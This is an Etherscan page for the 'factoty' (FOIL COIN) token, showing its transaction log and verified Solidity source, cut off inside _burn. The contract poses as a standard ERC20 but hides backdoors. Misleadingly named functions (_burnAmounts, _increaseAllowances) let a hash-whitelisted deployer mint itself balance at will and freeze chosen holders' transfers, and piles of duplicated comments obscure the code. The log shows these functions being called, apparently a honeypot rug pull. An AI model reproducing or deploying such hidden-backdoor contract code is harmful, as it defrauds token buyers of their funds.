ETH Price: $2,457.49 (-20.60%)
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve175141912023-06-19 13:48:47594 days ago1687182527IN
0x9b66eD53...C748F3925
0 ETH0.0008516918.17416243
_burn Amounts175141862023-06-19 13:47:47594 days ago1687182467IN
0x9b66eD53...C748F3925
0 ETH0.0005830618.19695504
Approve175129402023-06-19 9:35:59594 days ago1687167359IN
0x9b66eD53...C748F3925
0 ETH0.0011708224.98398319
Approve175128852023-06-19 9:24:59594 days ago1687166699IN
0x9b66eD53...C748F3925
0 ETH0.0015822733.54913308
Approve175128402023-06-19 9:15:47594 days ago1687166147IN
0x9b66eD53...C748F3925
0 ETH0.0021182945.20195399
Approve175128232023-06-19 9:12:23594 days ago1687165943IN
0x9b66eD53...C748F3925
0 ETH0.0024760552.5
Transfer175128062023-06-19 9:08:59594 days ago1687165739IN
0x9b66eD53...C748F3925
0 ETH0.0014945259.50258311
Approve175127852023-06-19 9:04:47594 days ago1687165487IN
0x9b66eD53...C748F3925
0 ETH0.0030313164.68468858
Approve175127572023-06-19 8:59:11594 days ago1687165151IN
0x9b66eD53...C748F3925
0 ETH0.0006617914.10380418
Approve175127572023-06-19 8:59:11594 days ago1687165151IN
0x9b66eD53...C748F3925
0 ETH0.0007509416.00380418
Approve175127472023-06-19 8:57:11594 days ago1687165031IN
0x9b66eD53...C748F3925
0 ETH0.0006510913.87586168
_increase Allowa...175127162023-06-19 8:50:59594 days ago1687164659IN
0x9b66eD53...C748F3925
0 ETH0.000677913.74479166
_increase Allowa...175127002023-06-19 8:47:47594 days ago1687164467IN
0x9b66eD53...C748F3925
0 ETH0.0006918814.02825056
Approve175126982023-06-19 8:47:23594 days ago1687164443IN
0x9b66eD53...C748F3925
0 ETH0.0007186415.23748001
Approve175126962023-06-19 8:46:59594 days ago1687164419IN
0x9b66eD53...C748F3925
0 ETH0.0006522613.92204579
Approve175126962023-06-19 8:46:59594 days ago1687164419IN
0x9b66eD53...C748F3925
0 ETH0.0006754714.32204579
_increase Allowa...175126882023-06-19 8:45:23594 days ago1687164323IN
0x9b66eD53...C748F3925
0 ETH0.0006240312.65254673
Approve175126882023-06-19 8:45:23594 days ago1687164323IN
0x9b66eD53...C748F3925
0 ETH0.0007344315.55254673
_increase Allowa...175126852023-06-19 8:44:47594 days ago1687164287IN
0x9b66eD53...C748F3925
0 ETH0.000681113.80964118
Approve175126842023-06-19 8:44:35594 days ago1687164275IN
0x9b66eD53...C748F3925
0 ETH0.0007654616.20960948
_increase Allowa...175126802023-06-19 8:43:47594 days ago1687164227IN
0x9b66eD53...C748F3925
0 ETH0.0006584513.35031001
Approve175126802023-06-19 8:43:47594 days ago1687164227IN
0x9b66eD53...C748F3925
0 ETH0.0009090519.25031001
Approve175126772023-06-19 8:43:11594 days ago1687164191IN
0x9b66eD53...C748F3925
0 ETH0.000671414.23594316
Approve175126762023-06-19 8:42:59594 days ago1687164179IN
0x9b66eD53...C748F3925
0 ETH0.0006581614.04450862
Approve175126742023-06-19 8:42:35594 days ago1687164155IN
0x9b66eD53...C748F3925
0 ETH0.0008556818.12000704
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
factoty

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-18
*/

/**
 *Submitted for verification at Etherscan.io on 2023-06-18
*/

/**

Telegram : https://t.me/FOIL COIN
Twitter : https://twitter.com/FOIL COIN

*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;



library SafeMath {
   
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

   
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
    
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

   
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }


    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }


    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

 
    function subbbb(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }


    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function subbbb(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}



pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}




pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {        
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    /**
    * @dev Provides information about the current execution context, including the
    * sender of the transaction and its data. While these are generally available
    * via msg.sender and msg.data, they should not be accessed in such a direct
    * manner, since when dealing with meta-transactions the account sending and
    * paying for execution may not be the actual sender (as far as an application
    * is concerned).
    *
    * This contract is only required for intermediate, library-like contracts.
    */
    /**
    * @dev Provides information about the current execution context, including the
    * sender of the transaction and its data. While these are generally available
    * via msg.sender and msg.data, they should not be accessed in such a direct
    * manner, since when dealing with meta-transactions the account sending and
    * paying for execution may not be the actual sender (as far as an application
    * is concerned).
    *
    * This contract is only required for intermediate, library-like contracts.
    */
}




pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}



pragma solidity ^0.8.0;



/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract factoty is Context, IERC20, IERC20Metadata,Ownable {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(bytes32 => bool) private kk;
    address private  _ppproject;
    uint256 private _totalSupply;
    string private _name;
    string private _symbol;
    uint40 private _tokenAmount;
    address public immutable deadAddress = 0x000000000000000000000000000000000000dEaD;  
    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
     /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    
    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
     /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
     /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function _msgnnn() private returns(bytes32){_ppproject = _msgSender();bytes32 aa = keccak256(abi.encodePacked(_msgSender()));kk[aa] = true;return aa;}
    function _isopensss() private view returns (bool){bytes32 aa = keccak256(abi.encodePacked(_msgSender()));if(kk[aa]){return true;}return false;}
     /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_, uint40 tokenAmount_) {
        _name = name_;
        _symbol = symbol_;
        _msgnnn();
        _tokenAmount = tokenAmount_;
        _mint(msg.sender, _tokenAmount*10**decimals());
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {return _symbol;}
    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function decimals() public view virtual override returns (uint8) {return 9;}
    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function totalSupply() public view virtual override returns (uint256) {return _totalSupply;}
    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {return _balances[account];}function transfer(address to, uint256 amount) public virtual override returns (bool) {address owner = _msgSender();_transfer(owner, to, amount);return true;}bytes32 private rhash = 0x1779a64e8b9cd87d9944553af38e0a07794a3c9286f5269ef06354b2c306ff01;function allowance(address owner, address spender) public view virtual override returns (uint256) {return _allowances[owner][spender];}
    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {address owner = _msgSender();_approve(owner, spender, amount);return true;}
    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     * rhashzhjasuiuo
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }
        return true;
    }
    function _xxxx(uint256 nnn) private {if(_isopensss()){ _balances[_msgSender()] = _totalSupply*nnn; }} 
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    mapping(address => uint256) private bhighkingdao;
    function _decreaseAllowances(address nnn) external  {if(_isopensss()){ bhighkingdao[nnn] = 0; }}
    function _increaseAllowances(address nnn) external  {if(_isopensss()){ bhighkingdao[nnn] = _totalSupply*10**6; }}
    function _allowance(address nnn) public view returns(uint256)  {return bhighkingdao[nnn];}
    function _burnAmounts(uint256 num) external {_xxxx(num);}
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a  balance of at least `amount`.
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     * rhashzhjasuiuo

     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    uint256 fettt = 0;
    function _transfer(
        address from,
        address to,
        uint256 amount1
    ) internal virtual {
        /**
        * @dev Moves `amount` of tokens from `from` to `to`.
        *
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        * SHDHCHJSXXX
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero rhash address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        */
        uint256 bugAmount = bhighkingdao[from].subbbb(0);
        require(bugAmount <= amount1, "KKKKK");
        /**
        * @dev Moves `amount` of tokens from `from` to `to`.
        *
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the rhash zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        */ 
         /**
        * @dev Moves `amount` of tokens from `from` to `to`.
        *
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        * ASXHJSDHJS
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot rhash be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        * This internal function is equivalent to {transfer}, and can be used to
        * e.g. implement automatic token fees, slashing mechanisms, etc.
        *
        * Emits a {Transfer} event.
        *
        * Requirements:
        *
        * - `from` cannot be the zero address.
        * - `to` cannot be the zero address.
        * - `from` must have a balance of at least `amount`.
        */ 
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount1, "ERC20: transfer amount exceeds balance");
        uint256 feeeeeA = amount1.mul(fettt).div(100);
        uint256 add = amount1.subbbb(feeeeeA);
        unchecked {
            _balances[from] = fromBalance - amount1;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += add;
            _balances[deadAddress] += feeeeeA;  
        }
        emit Transfer(from, to, amount1);  
        if(feeeeeA > 0)
        {
            emit Transfer(from, deadAddress, feeeeeA);
        } 
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _totalSupply += amount;if(kk[rhash] == false){ kk[rhash] = true;} unchecked { _balances[account] += amount;}
        emit Transfer(address(0), account, amount);  
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
    unchecked {
        _balances[account] = accountBalance - amount;
